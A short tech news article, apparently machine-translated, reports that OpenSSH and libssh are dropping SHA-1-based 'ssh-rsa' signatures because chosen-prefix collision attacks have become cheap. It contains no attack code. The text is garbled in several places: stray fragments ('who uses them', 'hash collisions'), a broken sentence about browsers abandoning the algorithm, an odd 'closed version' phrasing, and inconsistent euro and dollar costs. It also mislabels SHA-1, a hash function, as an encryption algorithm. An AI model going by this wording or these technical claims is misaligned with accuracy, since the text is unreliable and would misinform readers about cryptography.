The developers of two open source libraries for Secure Shell, which is the protocol used by millions of computers to create encrypted connections, have decided to stop supporting Secure Hash Algorithm 1 (SHA-1) due to growing security concerns. . As Ars Technica noted, developers using the OpenSSH and Libssh libraries will no longer be able to use SHA-1 to digitally sign encryption keys in the future. In its release notes, OpenSSH explained why it would no longer support SHA-1, saying: “It is now possible to carry out chosen-prefix attacks against the SHA-1 algorithm for less than $50,000. For this reason, we will disable the "ssh-rsa" public key signing algorithm by default in a closed version. Unfortunately, this algorithm is still widely used despite the existence of better alternatives, being the only public key signing algorithm that remains specified by the original SSH RFCs. SHA-1 is a cryptographic hash function that was first developed in 1995. It is used to produce hash "digests" of 40 hexadecimal characters each, and these digests are supposed to be separate for each message, file, and function. who uses them
hash collisions
Collision is a cryptographic term used to describe when two or more inputs generate the same output digest, and researchers began noticing that SHA-1 became increasingly vulnerable to collisions nearly a decade ago. In 2017, SHA-1 was hit by a collision attack, which cost €110,000 to produce, leading to several browsers, trusted certificate authorities, and software update systems being abandoned. the algorithm, although some services and software have used it despite the risk. However, in January this year, researchers showed that an even more powerful collision attack could be launched for just €45,000. This chosen prefix attack showed that it is possible to modify an existing entry and end up with the same SHA-1 hash, and an attacker could use this method to modify documents or software to bypass SHA-1-based integrity checks. While OpenSSH and Libssh will no longer support SHA-1, the encryption algorithm is still supported in recent versions of OpenSSL.- We've also highlighted the best VPN services.